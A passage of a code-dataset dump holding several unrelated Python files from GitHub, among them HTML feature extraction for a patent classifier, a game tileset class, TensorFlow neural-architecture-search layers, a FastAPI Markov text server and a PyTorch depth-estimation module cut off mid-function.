287']\nPRODUCT_TERMS = ['product manual', 'user guide', 'user manual',\n 'product specification', 'product details',\n 'product description']\nNEWS_TERMS = ['news', 'blog', 'article']\n\ndef get_url_features(original_df: pd.DataFrame) -> pd.DataFrame:\n \"\"\" Uses URL column to add new columns related to URL properties.\n\n Args:\n original_df: original DataFrame.\n\n Returns:\n Original DataFrame with additional URL-related columns.\n \"\"\"\n\n df = original_df.copy()\n\n df['url'] = df.url.apply(lambda s: s.lower())\n\n # \"patent\" in URL\n df.loc[:, 'url_patent'] = df.url.apply(lambda s: 'patent' in s)\n\n # \"product\" in URL\n df.loc[:, 'url_product'] = df.url.apply(lambda s: 'product' in s)\n\n # number of characters in URL\n df['len_url'] = df['url'].apply(lambda x: len(x))\n\n # news terms in URL\n df.loc[:, 'url_news'] = df.url.apply(\n lambda s: any(term in s for term in NEWS_TERMS))\n\n # date format detected in URL\n df.loc[:, 'url_date'] = df.url.apply(\n lambda s: len(re.findall(DATE_URL_PATTERN, s)) > 0)\n\n return df\n\ndef add_html_column(original_df: pd.DataFrame) -> pd.DataFrame:\n \"\"\" Adds column containing HTML for each sample.\n\n Args:\n original_df: original DataFrame containing filename column.\n\n Returns:\n Original DataFrame with additional HTML column.\n \"\"\"\n\n df = original_df.copy()\n\n df['html'] = ''\n\n for i, r in df.iterrows():\n with open(r.filename, 'r', encoding='utf-8', errors='ignore') as f:\n df.loc[i, 'html'] = f.read()\n \n df['html'] = df.html.apply(lambda r: str(r).lower())\n \n print('Successfully added HTML column')\n return df\n\ndef get_html_features(original_df: pd.DataFrame) -> pd.DataFrame:\n \"\"\" Uses HTML column to add new columns related to HTML properties.\n\n Args:\n original_df: original DataFrame.\n\n Returns:\n Original DataFrame with additional HTML-related columns.\n \"\"\"\n df = original_df.copy()\n\n if 'html' not in df.columns:\n raise AttributeError('HTML column missing from DataFrame.')\n \n # number of times \"patent\" appears in HTML\n df.loc[:, 'html_n_patent'] = df.html.apply(lambda s: s.count('patent'))\n\n # number of times US code 287 appears in HTML\n df['n_us_code'] = 0\n\n # number of times product-specific terms appear in HTML\n df['n_product'] = 0\n\n for i, r in df.iterrows():\n n_us_code = sum([r.html.lower().count(code) for code in US_CODE_TERMS])\n df.loc[i, 'n_us_code'] = n_us_code\n\n n_product = sum([r.html.lower().count(s) for s in PRODUCT_TERMS])\n df.loc[i, 'n_product'] = n_product\n\n # number of times the patent number pattern appears in HTML\n df.loc[:, 'n_patent_strings'] = df.html.apply(\n lambda s: len(re.findall(PATENT_NUMBER_PATTERN, s)))\n\n # number of date-like substrings in HTML\n df.loc[:, 'n_dates'] = df.html.apply(\n lambda s: len(re.findall(DATE_HTML_PATTERN, s)))\n\n # date format detected in HTML\n df['contains_date'] = df['n_dates'] > 0\n return df\n\ndef get_footer_features(original_df: pd.DataFrame) -> pd.DataFrame:\n \"\"\" Uses HTML column to detect footers and add columns related to footers.\n\n Args:\n original_df: original DataFrame.\n\n Returns:\n Original DataFrame with additional footer-related columns.\n \"\"\"\n\n df = original_df.copy()\n\n # to adhere to copyright pattern\n df['html'] = df['html'].apply(lambda s: s.replace('©', '(c)'))\n\n non_alnum_allowed = set(string.punctuation).union(set(['\\n', ' ']))\n df['html_stripped'] = df.html.apply(\n lambda s: ''.join([c for c in s if c.isalnum() or c in non_alnum_allowed]))\n\n def split_index_end(s):\n indices = [] \n for k in COPYRIGHT_PATTERN:\n for m in re.finditer(k, s):\n indices.append(m.start(0))\n return len(s) - indices[0] if len(indices) else 0\n\n df['split_idx'] = df.html_stripped.apply(\n lambda r: r[-1500:] if len(str(r)) > 1500 else r)\\\n .apply(lambda r: str(r).replace('\\n', ' ').replace('*', ''))\\\n .apply(lambda r: split_index_end(str(r)))\n\n # adds footer column \n df['footer'] = ''\n df.loc[df['split_idx'] > 0, 'footer'] = df[df['split_idx'] > 0].apply(\n lambda r: r['html_stripped'][-r['split_idx']:], axis=1)\n\n # True if \"patent\" in footer\n df['footer_patent'] = df.footer.str.contains('patent')\n\n df.drop(columns=['html_stripped', 'split_idx', 'footer'], inplace=True)\n\n return df\n\ndef get_general_features(original_df: pd.DataFrame,\n save: bool = True,\n save_as: str = None) -> pd.DataFrame:\n \"\"\" Generates general URL and HTML-specific features for DataFrame.\n\n Args:\n original_df: DataFrame containing filename, url, category columns\n save: Specifies if generated DataFrame should be saved. If True,\n saves as save_as filename. Defaults to True.\n save_as: Filename to save DataFrame as. Defaults to None.\n\n Raises:\n AttributeError: If save is True, but no save_as filename is specified.\n\n Returns:\n DataFrame containing additional URL and HTML-specific features.\n \"\"\"\n\n df = original_df.copy() \n df = get_url_features(df)\n df = add_html_column(df)\n df = get_html_features(df)\n df = get_footer_features(df)\n\n if save:\n if not save_as:\n raise AttributeError('Save directory is not specified.')\n df.to_csv(save_as,\n encoding='utf-8',\n header=True,\n index=False)\n print('Saved general features DataFrame.')\n \n return df","repo_name":"marikomakhm/vpm-classifier","sub_path":"feature_processing.py","file_name":"feature_processing.py","file_ext":"py","file_size_in_byte":6559,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"33485592032","text":"# Class to contain information about a tileset\n# Contains:\n#\tThe data of the actual tileset\n#\tThe size of the tileset\n#\tThe size of the individual tiles\n#\t\n#\tFunctions for getting a specific tile (returning a tile structure)\n#\t\n#\n#\n#\n\nfrom base import Base\nfrom tile import Tile\n\nclass Tileset (Base):\n\tdef __init__(self):\n\t\tBase.__init__(self)\n\t\t\n\t\tself.map = None\t\t\t\t\t\t# The associated map\n\t\t\n\t\tself.data =\tNone\t\t\t \t\t# The tileset image\n\t\tself.size = [0, 0] \t\t\t\t\t# In pixels\n\t\tself.sizeTiles = [0, 0] \t\t\t# In tiles\n\t\t\n\t\tself.tileSize = [0, 0]\t\t\t\t# In pixels\n\t\t\n\t\"\"\"Loads an image to use as a tileset\n\t\tArgs:\n\t\t\tfilename - The path to the image to use.\n\t\t\tsize - The size of each tile (in pixels)\n\t\t\t\n\t\tReturns:\n\t\t\tTrue if succesfull, False if not\n\t\"\"\"\n\tdef load(self, filename, size):\n\t\t# Try to load the file\n\t\timage = self.map.drawer.loadImage(filename)\n\t\tif not image:\n\t\t\tprint(\"Could not load image at \" + filename)\n\t\t\treturn False\n\t\t\t\n\t\t# Okay, file loaded.\n\t\tself.data = image\n\t\t\n\t\t# Set the tilesize\n\t\tself.tileSize = size\n\t\t\n\t\t# Get the size of the image\n\t\tself.size = self.map.drawer.getRes(image)\n\t\t\n\t\t# Figure out the size of the set in tiles\n\t\tself.sizeTiles[0] = int(self.size[0] / self.tileSize[0])\n\t\tself.sizeTiles[1] = int(self.size[1] / self.tileSize[1])\n\t\n\t\"\"\"Get the top and bottom coords for a tile\n\t\n\t\tArgs:\n\t\t\ttileCoord - The coordinate of the tile (in tiles)\n\t\t\t\n\t\tReturns:\n\t\t\tA list in the form ((topX, topY), (bottomX, bottomY))\n\t\"\"\"\n\tdef _getCoords(self, tileCoord):\n\t\t# Do some simple maths to get the coords\n\t\ttop = (tileCoord[0]*self.tileSize[0], tileCoord[1]*self.tileSize[1])\n\t\tbottom = (top[0] + self.tileSize[0], top[1] + self.tileSize[1])\n\t\t\n\t\t# Make sure these values are within the size of the tileset\n\t\tif top[0] < 0 or top[1] < 0 or bottom[0] > self.size[0] or bottom[1] > self.size[1]:\n\t\t\t# One of the values is too big\n\t\t\tprint (\"Warning: The tile coords requested are out of the bounds of the tileset!\")\n\t\t\tprint (\"The coordinates returned are of the tile (0, 0)\")\n\t\t\treturn ((0, 0), (0, 0))\n\t\telse:\n\t\t\treturn (top, bottom)\n\t\t\t\n\t\"\"\"Get a tile\n\t\t\n\t\tArgs:\n\t\t\ttileCoord - The coordinate of the tile (in tiles)\n\t\t\t\n\t\tReturns:\n\t\t\tA tile structure representing the requested tile\n\t\"\"\"\n\tdef getTile(self, tileCoord):\n\t\ttile = Tile()\n\t\ttile.tileset = self\n\t\ttile.topcoord, tile.bottomcoord = self._getCoords(tileCoord)\n\t\t\n\t\treturn tile\n","repo_name":"bombpersons/RPGlibs","sub_path":"tilez/tileset.py","file_name":"tileset.py","file_ext":"py","file_size_in_byte":2371,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"24730365678","text":"\"\"\"\r\nset custom layers which can change inplanes and outplanes\r\n\"\"\"\r\nimport logging\r\nfrom tensorflow.keras import layers, Model\r\nimport tensorflow as tf\r\n\r\n\r\nclass SuperBatchNormalization(layers.Layer):\r\n def __init__(self, \r\n max_filters_in,\r\n momentum=0.9, \r\n epsilon=0.00001, \r\n center=True, \r\n scale=True,\r\n axis=-1,\r\n beta_initializer='zeros', \r\n gamma_initializer='ones',\r\n moving_mean_initializer='zeros', \r\n moving_variance_initializer='ones',\r\n inference_update_stat = False,\r\n name=None,\r\n **kwargs):\r\n super(SuperBatchNormalization, self).__init__(name=name, **kwargs)\r\n self.momentum = momentum\r\n self.momentum_rest = 1.0 - momentum\r\n if axis < 0 : axis += 4\r\n self.axes = [0,1,2,3][:axis]+[0,1,2,3][axis+1:]\r\n self.momentum = momentum\r\n self.epsilon = epsilon\r\n self.center = center\r\n self.scale = scale\r\n self.beta_initializer = beta_initializer\r\n self.gamma_initializer = gamma_initializer\r\n self.moving_mean_initializer = moving_mean_initializer\r\n self.moving_variance_initializer = moving_variance_initializer\r\n self.inference_update_stat = inference_update_stat\r\n \r\n\r\n self.max_filters_in = max_filters_in\r\n\r\n self.gamma = self.add_weight(name=self.name+'/gamma',\r\n shape=(self.max_filters_in,),\r\n initializer=self.gamma_initializer,\r\n trainable=scale)\r\n\r\n self.beta = self.add_weight(name=self.name+'/beta',\r\n shape=(self.max_filters_in,),\r\n initializer=self.beta_initializer,\r\n trainable=center)\r\n\r\n self.moving_mean = self.add_weight(name=self.name+'/moving_mean',\r\n shape=(self.max_filters_in,),\r\n initializer=self.moving_mean_initializer,\r\n trainable=False)\r\n\r\n self.moving_var = self.add_weight(name=self.name+'/moving_var',\r\n shape=(self.max_filters_in,),\r\n initializer=self.moving_variance_initializer,\r\n trainable=False)\r\n self.concat = layers.Concatenate(axis=-1, name='cat')\r\n \r\n\r\n def call(self, x, training=True, **kwargs):\r\n filters_in = x.shape[-1]\r\n assert filters_in <= self.max_filters_in\r\n logging.debug('use bn')\r\n\r\n mean, var = tf.nn.moments(x, axes=self.axes, keepdims=False, name='moments')\r\n\r\n gamma = tf.slice(self.gamma, [0], [filters_in])\r\n beta = tf.slice(self.beta, [0], [filters_in])\r\n\r\n if not self.inference_update_stat: \r\n logging.debug('bn')\r\n out = tf.nn.batch_normalization(x, mean, var, \r\n offset=beta, scale=gamma, \r\n variance_epsilon=self.epsilon, name='bn')\r\n\r\n else:\r\n moving_mean = tf.slice(self.moving_mean, [0], [filters_in])\r\n moving_var = tf.slice(self.moving_var, [0], [filters_in])\r\n \r\n moving_mean = self.momentum * mean + self.momentum_rest * moving_mean\r\n moving_var = self.momentum * var + self.momentum_rest * moving_var\r\n self.moving_mean.assign( self.concat([moving_mean, self.moving_mean[x.shape[-1]:]]) )\r\n self.moving_var.assign( self.concat([moving_var, self.moving_var[x.shape[-1]:]]) )\r\n\r\n out = tf.nn.batch_normalization(x, \r\n moving_mean, moving_var, \r\n offset=beta, scale=gamma, \r\n variance_epsilon=self.epsilon, name='bn')\r\n \r\n return out\r\n\r\nclass SuperConv2d(layers.Layer):\r\n def __init__(self, \r\n max_filters_in, \r\n max_filters_out,\r\n max_kernel_size, \r\n strides=(1, 1), \r\n padding='SAME', \r\n data_format=None,\r\n use_bias=True,\r\n kernel_initializer='glorot_uniform', \r\n bias_initializer='zeros',\r\n kernel_regularizer=None, \r\n bias_regularizer=None,\r\n name=None, **kwargs):\r\n super(SuperConv2d, self).__init__(name=name, **kwargs)\r\n\r\n self.max_kernel_size = max_kernel_size\r\n self.max_filters_in = max_filters_in\r\n self.max_filters_out = max_filters_out\r\n \r\n self.strides = [strides]*2 if type(strides) == int else strides\r\n self.padding=padding\r\n self.data_format=data_format\r\n\r\n self.use_bias=use_bias\r\n self.kernel_initializer=kernel_initializer\r\n self.bias_initializer=bias_initializer\r\n self.kernel_regularizer=kernel_regularizer\r\n self.bias_regularizer=bias_regularizer\r\n\r\n \r\n self.w = self.add_weight(name=self.name+'/kernel',\r\n shape=(max_kernel_size, max_kernel_size, max_filters_in, max_filters_out),\r\n initializer=self.kernel_initializer,\r\n trainable=True)\r\n if self.use_bias:\r\n self.b = self.add_weight(name=self.name+'/bias',\r\n shape=(max_filters_out,),\r\n initializer=self.bias_initializer,\r\n trainable=True)\r\n \r\n def call(self, x, training=None, filters_out=None, kernel_size=None, **kwargs):\r\n \r\n kernel_size = kernel_size if kernel_size is not None else self.max_kernel_size\r\n filters_out = filters_out if filters_out is not None else self.max_filters_out\r\n \r\n filters_in = x.shape[-1]\r\n assert filters_in <= self.max_filters_in\r\n assert kernel_size <= self.max_kernel_size, (kernel_size, self.max_kernel_size)\r\n assert filters_out <= self.max_filters_out\r\n \r\n weights = tf.slice(self.w, [0]*4, [kernel_size, kernel_size, filters_in, filters_out])\r\n\r\n conv = tf.nn.conv2d(x, filters=weights, strides=self.strides, \r\n padding=self.padding, data_format=self.data_format,\r\n name='conv')\r\n\r\n out = conv\r\n \r\n if self.use_bias:\r\n bias = tf.slice(self.b, [0], [filters_out])\r\n out = out + bias\r\n \r\n if self.kernel_regularizer:\r\n self.add_loss(self.kernel_regularizer(weights), inputs=True)\r\n if self.bias_regularizer:\r\n self.add_loss(self.bias_regularizer(bias), inputs=True)\r\n\r\n return out\r\n\r\n\r\nclass SuperDepthwiseConv2D(layers.Layer):\r\n def __init__(self, \r\n max_filters_in,\r\n max_kernel_size, \r\n strides=[1,1], \r\n padding='SAME', \r\n max_depth_multiplier=1,\r\n data_format=None,\r\n use_bias=True,\r\n depthwise_initializer='glorot_uniform', \r\n bias_initializer='zeros',\r\n depthwise_regularizer=None, \r\n bias_regularizer=None, \r\n name=None, **kwargs):\r\n super(SuperDepthwiseConv2D, self).__init__(name=name, **kwargs)\r\n \r\n strides = [strides]*2 if type(strides) == int else strides\r\n self.strides = [1] + strides + [1]\r\n\r\n self.max_kernel_size = max_kernel_size\r\n self.max_depth_multiplier = max_depth_multiplier\r\n self.max_filters_in = max_filters_in\r\n\r\n\r\n \r\n self.padding=padding\r\n self.data_format=data_format\r\n\r\n self.use_bias=use_bias\r\n self.depthwise_initializer=depthwise_initializer\r\n self.bias_initializer=bias_initializer\r\n self.depthwise_regularizer=depthwise_regularizer\r\n self.bias_regularizer=bias_regularizer\r\n\r\n self.w = self.add_weight(name=self.name+'/kernel',\r\n shape=(max_kernel_size, max_kernel_size, max_filters_in, max_depth_multiplier),\r\n initializer=self.depthwise_initializer,\r\n trainable=True)\r\n if self.use_bias:\r\n self.b = self.add_weight(name=self.name+'/bias',\r\n shape=(max_filters_in*max_depth_multiplier),\r\n initializer=self.bias_initializer,\r\n trainable=True)\r\n \r\n\r\n def call(self, x, training=True, kernel_size=None, depth_multiplier=None, **kwargs):\r\n\r\n \r\n kernel_size = kernel_size if kernel_size is not None else self.max_kernel_size\r\n depth_multiplier = depth_multiplier if depth_multiplier is not None else self.max_depth_multiplier\r\n\r\n filters_in = x.shape[-1]\r\n assert filters_in <= self.max_filters_in\r\n assert kernel_size <= self.max_kernel_size\r\n assert depth_multiplier <= self.max_depth_multiplier\r\n\r\n\r\n \r\n weights = tf.slice(self.w, [0]*4, [kernel_size, kernel_size, filters_in, depth_multiplier])\r\n\r\n\r\n conv = tf.nn.depthwise_conv2d(\r\n x, weights, strides=self.strides, padding=self.padding,\r\n data_format=self.data_format, name='dconv'\r\n )\r\n\r\n\r\n out = conv\r\n \r\n if self.use_bias:\r\n\r\n bias = tf.slice(self.b, [0], [filters_in*depth_multiplier])\r\n out = out + bias\r\n \r\n \r\n if self.depthwise_regularizer:\r\n self.add_loss(self.depthwise_regularizer(weights), inputs=True)\r\n if self.bias_regularizer:\r\n self.add_loss(self.bias_regularizer(bias), inputs=True)\r\n \r\n return out\r\n\r\nclass Activation(layers.Layer):\r\n def __init__(self, activation, name=None, **kwargs):\r\n super(Activation, self).__init__(name=name, **kwargs)\r\n if activation in ['linear', 'relu', 'elu', 'selu', 'softmax', 'sigmoid', 'hard_sigmoid']:\r\n self.activate = layers.Activation(name, name=name)\r\n elif activation == 'relu6':\r\n self.activate = lambda x : tf.nn.relu6(x, name=name)\r\n elif activation == 'prelu':\r\n self.activate = layers.PReLU(shared_axes=[1,2], name=name)\r\n elif activation == 'swish':\r\n self.activate = tf.nn.swish\r\n else:\r\n raise ValueError('Activate name error , donot exist %s' % name)\r\n def call(self, x, **kwargs):\r\n x = self.activate(x)\r\n return x\r\n\r\n\r\nclass SuperMBConvBlock(Model):\r\n def __init__(self, \r\n max_filters_in,\r\n max_filters_out, \r\n max_expand_ratio, \r\n max_kernel_size,\r\n se_ratio, \r\n weight_decay, \r\n strides , \r\n use_shortcut=True,\r\n drop_connect_rate=None, \r\n data_format=None,\r\n activation='relu6', \r\n name=None, **kwargs):\r\n super(SuperMBConvBlock, self).__init__(name=name, **kwargs)\r\n \r\n self.use_shortcut = use_shortcut\r\n self.max_filters_in = max_filters_in\r\n self.max_filters_out = max_filters_out\r\n self.max_expand_ratio = max_expand_ratio\r\n self.max_kernel_size = max_kernel_size\r\n\r\n \r\n strides = [strides]*2 if type(strides) == int else strides\r\n max_expand_filters = max_filters_in * max_expand_ratio\r\n\r\n if max_expand_ratio != 1:\r\n self.expand_conv = SuperConv2d(max_filters_in=max_filters_in, \r\n max_filters_out=max_expand_filters,\r\n max_kernel_size=1, \r\n strides=(1, 1), \r\n padding='SAME', \r\n data_format=data_format,\r\n use_bias=False,\r\n kernel_initializer='he_normal', \r\n kernel_regularizer=tf.keras.regularizers.l2(weight_decay), \r\n name='expand_conv')\r\n self.expand_bn = SuperBatchNormalization(max_expand_filters, name='bn')\r\n self.expand_act = Activation(activation, name = activation)\r\n\r\n\r\n\r\n #print('filters_in', expand_filters)\r\n #Depthwise Convlution\r\n self.extract_dconv = SuperDepthwiseConv2D(max_filters_in=max_expand_filters,\r\n max_kernel_size=max_kernel_size, \r\n strides=strides, \r\n padding='SAME', \r\n max_depth_multiplier=1,\r\n data_format=data_format,\r\n use_bias=False,\r\n depthwise_initializer='he_normal', \r\n depthwise_regularizer=tf.keras.regularizers.l2(weight_decay), \r\n name='extract_dconv')\r\n self.extract_bn = SuperBatchNormalization(max_expand_filters, name='extract_bn')\r\n self.extract_act = Activation(activation, name=activation)\r\n\r\n \r\n self.project_conv = SuperConv2d(max_filters_in=max_expand_filters, \r\n max_filters_out=max_filters_out,\r\n max_kernel_size=1, \r\n strides=(1, 1), \r\n padding='SAME', \r\n data_format=data_format,\r\n use_bias=False,\r\n kernel_initializer='he_uniform', \r\n kernel_regularizer=tf.keras.regularizers.l2(weight_decay), \r\n name='project_conv')\r\n self.project_bn = SuperBatchNormalization(max_filters_out, name='project_bn')\r\n \r\n\r\n if use_shortcut:\r\n if drop_connect_rate and (0.0 < drop_connect_rate < 1.0) :\r\n self.dp = layers.Dropout(drop_connect_rate, noise_shape=(None, 1, 1, 1),\r\n name='dp')\r\n else:\r\n self.dp = lambda x, training : x\r\n\r\n \r\n def call(self, x, training, filters_out=None, expand_ratio=None, kernel_size=None):\r\n kernel_size = kernel_size if kernel_size is not None else self.max_kernel_size\r\n filters_out = filters_out if filters_out is not None else self.max_filters_out\r\n expand_ratio = expand_ratio if expand_ratio is not None else self.max_expand_ratio\r\n \r\n filters_in = x.shape[-1]\r\n assert kernel_size <= self.max_kernel_size\r\n assert filters_in <= self.max_filters_in\r\n assert filters_out <= self.max_filters_out\r\n assert expand_ratio <= self.max_expand_ratio\r\n \r\n origin = x\r\n if self.max_expand_ratio != 1:\r\n x = self.expand_conv(x, training, kernel_size=1, filters_out=filters_in*expand_ratio)\r\n x = self.expand_bn(x, training=training)\r\n x = self.expand_act(x)\r\n\r\n\r\n\r\n x = self.extract_dconv(x, training, kernel_size=kernel_size, depth_multiplier=1)\r\n x = self.extract_bn(x, training=training)\r\n x = self.extract_act(x)\r\n\r\n x = self.project_conv(x, training, filters_out = filters_out, kernel_size=1)\r\n x = self.project_bn(x, training=training)\r\n \r\n if self.use_shortcut and origin.shape[1:] == x.shape[1:]:\r\n x = self.dp(x, training)\r\n x = x + origin\r\n \r\n return x\r\n\r\n\r\nclass SuperKESMBConvBlock(Model):\r\n\r\n \"\"\"\r\n \"kernel size and expand ratio select ConvBlock\r\n \"\"\"\r\n def __init__(self, \r\n expand_ratio, \r\n kernel_size,\r\n **kwargs):\r\n super(SuperKESMBConvBlock, self).__init__(name=kwargs['name'])\r\n self.expand_ratio = expand_ratio\r\n self.kernel_size = kernel_size\r\n\r\n #self.choices = [ [[]] * len(expand_ratio) ] * len(kernel_size)\r\n self.choices = [] \r\n for k_size in kernel_size:\r\n for ex_ratio in expand_ratio:\r\n self.choices.append( SuperMBConvBlock(max_expand_ratio=ex_ratio, \r\n max_kernel_size=k_size, **kwargs) )\r\n \r\n def call(self, x, training, expand_ratio=None, kernel_size=None, **kwargs):\r\n \r\n assert kernel_size in self.kernel_size\r\n assert expand_ratio in self.expand_ratio\r\n\r\n i = self.kernel_size.index(kernel_size)*len(self.expand_ratio)\r\n j = self.expand_ratio.index(expand_ratio)\r\n x = self.choices[i+j](x, training, **kwargs)\r\n return x\r\n\r\nclass SuperKSMBConvBlock(Model):\r\n\r\n \"\"\"\r\n \"kernel size select ConvBlock\r\n \"\"\"\r\n def __init__(self, \r\n kernel_size,\r\n **kwargs):\r\n super(SuperKSMBConvBlock, self).__init__(name=kwargs['name'])\r\n self.expand_ratio = expand_ratio\r\n self.kernel_size = kernel_size\r\n\r\n #self.choices = [ [[]] * len(expand_ratio) ] * len(kernel_size)\r\n self.choices = [] \r\n for k_size in kernel_size:\r\n self.choices.append( SuperMBConvBlock(max_kernel_size=k_size, **kwargs) )\r\n \r\n def call(self, x, training, kernel_size=None, **kwargs):\r\n \r\n assert kernel_size in self.kernel_size\r\n assert expand_ratio in self.expand_ratio\r\n\r\n i = self.kernel_size.index(kernel_size)\r\n x = self.choices[i](x, training, **kwargs)\r\n return x\r\n\r\nclass SuperESMBConvBlock(Model):\r\n\r\n \"\"\"\r\n \"expand ratio select ConvBlock\r\n \"\"\"\r\n def __init__(self, \r\n expand_ratio, \r\n **kwargs):\r\n super(SuperESMBConvBlock, self).__init__(name=kwargs['name'])\r\n self.expand_ratio = expand_ratio\r\n\r\n self.choices = [] \r\n for ex_ratio in expand_ratio:\r\n self.choices.append( SuperMBConvBlock(max_expand_ratio=ex_ratio, **kwargs) )\r\n \r\n def call(self, x, training, expand_ratio=None,**kwargs):\r\n \r\n assert expand_ratio in self.expand_ratio\r\n\r\n i = self.expand_ratio.index(expand_ratio)\r\n x = self.choices[i](x, training, **kwargs)\r\n return x","repo_name":"Brococoli/FairNAS","sub_path":"oneshot_nas_blocks.py","file_name":"oneshot_nas_blocks.py","file_ext":"py","file_size_in_byte":18455,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"53"} +{"seq_id":"30838828508","text":"def minNum(arr, n):\n \"\"\"Returns the minimum number from the array using recursion\n Base case: if len(arr) is 1 then return arr[0]\n else return minimum of (n-1)th element and recursion output for n-1 elements\n Time: O(n) since in-built `max` function takes linear time to find the max element\n Space: O(1) since only one variable is created to store the max value while searching\n \"\"\"\n\n if n == 1:\n return arr[0]\n else:\n return min(minNum(arr, n - 1), arr[n - 1])\n\n\ndef maxNum(arr, n):\n if n == 1:\n return arr[0]\n else:\n # the below block essentially is MAX(arr[n-1], arr[n-2],........., arr[0])\n return max(arr[n - 1], maxNum(arr, n - 1))\n\n\nif __name__ == \"__main__\":\n arr = [1, 4, 45, 6, -50, 10, 2]\n n = len(arr)\n print(minNum(arr, n))\n print(maxNum(arr, n))\n","repo_name":"ashirwadsangwan/Handbook-of-DS-Learning","sub_path":"DS and Algorithms/Topics/Recursion/minMaxOfArray.py","file_name":"minMaxOfArray.py","file_ext":"py","file_size_in_byte":851,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"19421591460","text":"from fastapi import FastAPI\nimport markovify\nimport time\nimport uvicorn\nfrom os import environ\n\napp = FastAPI()\nport = int(environ.get('PORT', 3000))\n\nwith open('./aqua.json', 'r') as file:\n aqua_model = markovify.Text.from_json(file.read())\n\n@app.get('/')\ndef root():\n return {'endpoints': ['/aqua']}\n\n@app.get('/aqua')\ndef aqua(short: bool = False):\n start = time.perf_counter()\n while True:\n if short == True:\n response = aqua_model.make_short_sentence(max_chars=50)\n else:\n response = aqua_model.make_sentence()\n if response is not None:\n break\n end = time.perf_counter()\n return {\n 'response': response,\n 'compute_time': end - start\n }\n\nuvicorn.run(app, host='0.0.0.0', port=port)\n","repo_name":"MarsRon/aqua","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":723,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"19122936944","text":"import setuptools\n\nwith open(\"README.org\", \"r\") as fh:\n long_description = fh.read()\n\n\nsetuptools.setup(\n name=\"ProxyTweet\",\n version=\"0.0.1\",\n author=\"Nathan Dwarhsuis\",\n author_email=\"natedwarshuis@gmail.com\",\n description=\"A lightweight Twitter to RSS feed generator\",\n long_description=long_description,\n long_description_content_type=\"text/x-org\",\n url=\"https://github.com/ndwarshuis/proxytweet\",\n zip_safe=False,\n include_package_data=True,\n packages=setuptools.find_packages(),\n install_requires=[\"Flask\", \"twitterscraper\", \"rfeed\", \"beautifulsoup4\"],\n classifiers=[\n \"Programming Language :: Python :: 3\",\n \"License :: OSI Approved :: GNU General Public License v3 (GPLv3)\",\n \"Operating System :: OS Independent\",\n ],\n entry_points={\"console_scripts\": [\"proxytweet=proxytweet.app:main\"]},\n)\n","repo_name":"ndwarshuis/proxytweet","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":868,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"24834920559","text":"''' IMPORTANT: Run this .py file from the terminal ONLY after navigating to the folder where your raw images are located\n\tThis script will read images from the current directory and resize them to 100x100, in grayscale, and put them\n\tin the mentioned folder\n\n'''\n\nimport os\nimport cv2\n\nht = 100\ni = 0\nos.chdir('/home/pallab/Pictures/Data/rawimgs')\nfor pic in os.listdir('.'):\n img = cv2.imread(pic, cv2.IMREAD_GRAYSCALE)\n img = cv2.resize(img, (ht, ht))\n cv2.imwrite('/home/pallab/Pictures/Data/treatedimgs/'+str(i)+'.jpg', img)\n i += 1\n\nprint('Resized and greyed', i, 'files', sep = ' ')\n","repo_name":"pallabganguly/opcv-project","sub_path":"src/resizeneg.py","file_name":"resizeneg.py","file_ext":"py","file_size_in_byte":601,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"2948725479","text":"from typing import Dict, Tuple\r\n\r\nimport math\r\nimport torch\r\nimport torch.nn as nn\r\nimport torch.nn.functional as F\r\n\r\nfrom torchvision import models\r\nfrom . import segmentation_definitions as segdef\r\n\r\n\r\nDEPTH_BINS = 50\r\nDEPTH_MAX = 5.0\r\n\r\nDISTR_DEPTH = True\r\nVEC_HEAD = True\r\n\r\nTRAIN_DEPTH_ONLY = False\r\nTRAIN_SEG_ONLY = True\r\nTRAIN_INV_ONLY = False\r\n\r\n\r\ndef _multidim_sm(x: torch.tensor, dims: Tuple[int, ...], log: bool):\r\n #_check_dims_consecutive(dims)\r\n init_shape = x.shape\r\n dims = list(sorted(dims))\r\n new_shape = [d for i, d in enumerate(init_shape) if i not in dims]\r\n new_shape = new_shape[:dims[0]] + [-1] + new_shape[dims[0]:]\r\n x = x.reshape(new_shape)\r\n dim = dims[0]\r\n\r\n if log:\r\n x = F.log_softmax(x, dim=dim)\r\n else:\r\n x = F.softmax(x, dim=dim)\r\n\r\n x = x.reshape(init_shape)\r\n return x\r\n\r\ndef multidim_softmax(x: torch.tensor, dims: Tuple[int, ...]) -> torch.tensor:\r\n return _multidim_sm(x, dims, log=False)\r\n\r\n\r\ndef multidim_logsoftmax(x: torch.tensor, dims: Tuple[int, ...]) -> torch.tensor:\r\n return _multidim_sm(x, dims, log=True)\r\n\r\n\r\nclass DepthEstimate():\r\n\r\n def __init__(self, depth_pred, num_bins, max_depth):\r\n # depth_pred: BxCxHxW tensor of depth probabilities over C depth bins\r\n # Convert logprobabilities to probabilities\r\n if depth_pred.max() < 0:\r\n depth_pred = torch.exp(depth_pred)\r\n\r\n if ((depth_pred.sum(dim=1) - 1).abs() < 1e-2).all():\r\n pass\r\n else:\r\n pickle.dump(depth_pred, open(\"depth_pred.p\", \"wb\"))\r\n assert ((depth_pred.sum(dim=1) - 1).abs() < 1e-2).all(), \"Depth prediction needs to be a simplex at each pixel, current sum is \" + str(depth_pred.sum(dim=1))\r\n\r\n self.depth_pred = depth_pred\r\n self.num_bins = num_bins\r\n self.max_depth = max_depth\r\n\r\n def to(self, device):\r\n depth_pred = self.depth_pred.to(device)\r\n return DepthEstimate(depth_pred, self.num_bins, self.max_depth)\r\n\r\n def domain(self, res=None):\r\n if res is None:\r\n res = self.num_bins\r\n return torch.arange(0, res, 1, device=self.depth_pred.device)[None, :, None, None]\r\n\r\n def domain_image(self, res=None):\r\n if res is None:\r\n res = self.num_bins\r\n domain = self.domain(res)\r\n domain_image = domain.repeat((1, 1, self.depth_pred.shape[2], self.depth_pred.shape[3])) * (self.max_depth / res)\r\n return domain_image\r\n\r\n def mle(self):\r\n 